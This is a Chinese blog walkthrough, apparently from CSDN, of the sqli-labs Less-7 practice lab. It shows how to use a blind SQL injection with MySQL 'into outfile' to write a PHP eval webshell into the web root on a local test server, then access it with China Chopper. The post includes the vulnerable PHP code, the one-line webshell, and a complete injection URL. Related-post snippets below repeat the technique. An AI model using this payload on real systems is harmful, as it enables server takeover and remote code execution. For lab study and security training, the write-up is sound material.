SQL注入:sqli-labs 7 文件上传漏洞

最新推荐文章于 2024-01-28 00:02:32 发布
最新推荐文章于 2024-01-28 00:02:32 发布
阅读量665 收藏
点赞数
分类专栏: 网络安全学习 文章标签: mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119647654
版权
  • 经过不断的测试,知道:sql 语句是:SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1(或者你直接代码审计(看答案))
  • 项目提示;You are in… Use outfile…,提示我们使用外部文件,所以这十有八九是一个文件上传漏洞,那如何上传?上传什么文件比较好?
  • 通过代码审计我们知道,这玩意永远都不会报错,因为被注释了:
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

  • 使用命令:into outfile 可以上传文件

  • 使用一句话木马:https://blog.csdn.net/ZripenYe/article/details/119189996新建一个木马文件,使用php为后缀。<?php @eval($_POST['password']);?>

  • 上传文件之前一定要检查自己my.ini配置文件中的secure-file-priv是否是等号后面没有数值,否则上传不了数据

  • 输入命令:http://127.0.0.1/sqli/Less-7/?id=1')) union select 1,"<?php @eval($_REQUEST[777]); ?>",3 into outfile "D:\\phpstudy_pro\\WWW\\sqli\\Less-7\\2.php" --++++++将文件上传到目录

  • 之后用中国菜刀等工具来访问页面(详情见博客)https://blog.csdn.net/ZripenYe/article/details/119189996

  • 另外,读取文件的操作是load_file() 函数

Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs 第七 多命通攻略
两个月亮
01-05 1717
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
sqli-labs 7(文件上传)
qq_42266432的博客
08-15 277
加单引号返回错误,id存在注入点 注入多次后,确认注入是’)) 然后使用order by猜出列数为3后,根据页面提示,使用outfile函数,此时为root权限的话,写入一句话还需获得绝对路径,能力有限,失败多次后只能去前面几取,希望日后有机会补上 获取到了数据库的安装路径后就开始尝试注入了 使用数据库安装路径发现并未成功写入,一阵捣鼓过后,发现my.ini文件中 secure_file_priv变量的值并不是数据库路径,这个变量是控制写入权限的 修改路径后,成功将一句话写入,现在可以用中国.
sqli-labs第七
YQavenger的博客
10-08 3218
1、首先判断注入点 正常显示是这样的 不正常显示是这样的 猜到最后,注入点是字符型,单引号加两个小括号,?id=1’)) – - 因为它只有正常显示和不正常显示两种状态,并且也没有MySQL的报错信息。正常来说,这里可以使用盲注,但是它页面上提示的有“Use outfile…”,既然它提示了,那么就说明它开了读写权限。所以这一就用SQL注入读写文件来试一下 2、判断文件路径 可以利用读文件函数load_file(),结合dnslog.cn网站,实现带外攻击,看到MySQL的安装目录在哪。 先说一下M
sqli-labs卡7(结合文件上传漏洞+一句马+菜刀)通思路
zyh1588的博客
10-28 1266
小白对sqli-labs第七的理解
sqli-labs靶场7(知道根目录的注入)
qq_46527080的博客
12-12 819
知识点 首先要掌握一下相的函数和知识点 函数: load_file()函数 是MySQL读取本地文件的函数(读取) into outfile()函数 是用来导出文件的(写入) @@basedir函数 查询当前路径 @@datadir函数 查询数据库安装路径 1.load_file()函数用法 2.into outfile()函数用法 查看一下 3.查询当前路径: select @@basedir; 4.查询当前MySQL路径: select @@datadir; 5.解决写入权限问题 在
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs中,你可以扮演黑客的角色,尝试找出并利用SQL注入漏洞,这有助于提升你的安全意识和测试技能。渗透测试工具如Burp Suite、Sqlmap等,可以辅助进行自动化扫描和漏洞利用。 五、漏洞环境 sqli-labs提供了...
sqli-labs靶场练习笔记
11-09
- **SQLi-Labs介绍**:SQLi-Labs是一款专为学习和实践SQL注入技术而设计的靶场环境。它包含了多个卡,每个卡都模拟了一个具有特定SQL注入漏洞的应用场景。 - **学习价值**:通过解决这些卡中的问题,学习者...
Sqli-labs——lesson7
weixin_62281892的博客
06-29 508
lesson7
SQL-labs练习记录(7~10)【文件上传,布尔,时间注入】
bin789456的博客
06-17 300
SQL-labs练习记录(7~9)【文件上传】 Less 7 这道题显然前面的都不奏效了,报错被替换成统一信息,无法获得信息提示,更不能报错注入。 当使用 ?id=1 and 1=2 时页面正常,仅能知道不是整形注入,但也不能确定是字符注入。 确定闭合方式时,单引号频繁报错 双引号的闭合貌似没有问题 但是又没有回显。 这里就要开始提到文件上传了,数据库的file权限规定了数据库用户是否有权限向操作系统内写入和读取已存在的数据 into outfile命令使用的环境: 服务器上写入一个文件的文件夹的完整路径
文件上传漏洞
m0_55772907的博客
04-28 3210
什么是文件上传漏洞 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 什么是webshell WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者
sqli-labs基础篇【第七】详细解析
Lucky小小吴的小屋
01-11 3310
sqli-labs基础篇【第七】详细解析,环境配置和注入判定
sqli-labs靶场第七
最新发布
喜欢创作各种技术类文章,希望可以帮到你
01-28 365
id=1' --+单引号报错,id=1" --+双引号不报错,可以判断是单引号闭合。id=1') --+也报错,尝试两个括号闭合,id=1')) --+不报错。
sqli-labs第七(详讲)
TA不懒,但还没有添加简介
09-11 4386
sqli-labs第七 第七根据提示知道要用outfile,于是通过注入判断发现是字符型 开始构造语句 结合前六的经验首先想到括号) 不对 再加一个括号试试? 对了 那么语句部分可能是 where id=(('$id')) 然后通过order by判断字段个数 先简单的提一下outfile 在MySQL里面使用select … into outfile可以把数据导出到文本文件上 里面有几个参数 secure_file_priv 用来限制导出效果。他有三个属性: null限制不能导出 为空可
sqlilab记(7)
qq_30570001的博客
01-20 450
into outfile用法:select “值” into outfile “文件路径和文件名”老规矩:还是要判断闭合点。这里判断注入点参考给出的参考资料第一个链接,里面写的很详细,很正确。load_file用法:select load_file( “文件路径”)2、文件操作函数有两个:into outfile、load_file。
文件上传漏洞——sqli-labs第7
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-28 2726
条件: 1.已知对应站点的绝对路径 2.File_priv开需要是打开状态 select file_priv from mysql.user; 3.secure_file_priv 不为null 设置为空,对所有路径均可进行导入导出。 设置为一个目录名字,只允许在该路径下导入导出。 设置为Null,禁止所有导入导出。 默认是NULL,可以通过my.conf文件mysqld一栏里进行配置,配置完成后,重启便会生效。 在末尾加上:secure_file_priv= select @@gl
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值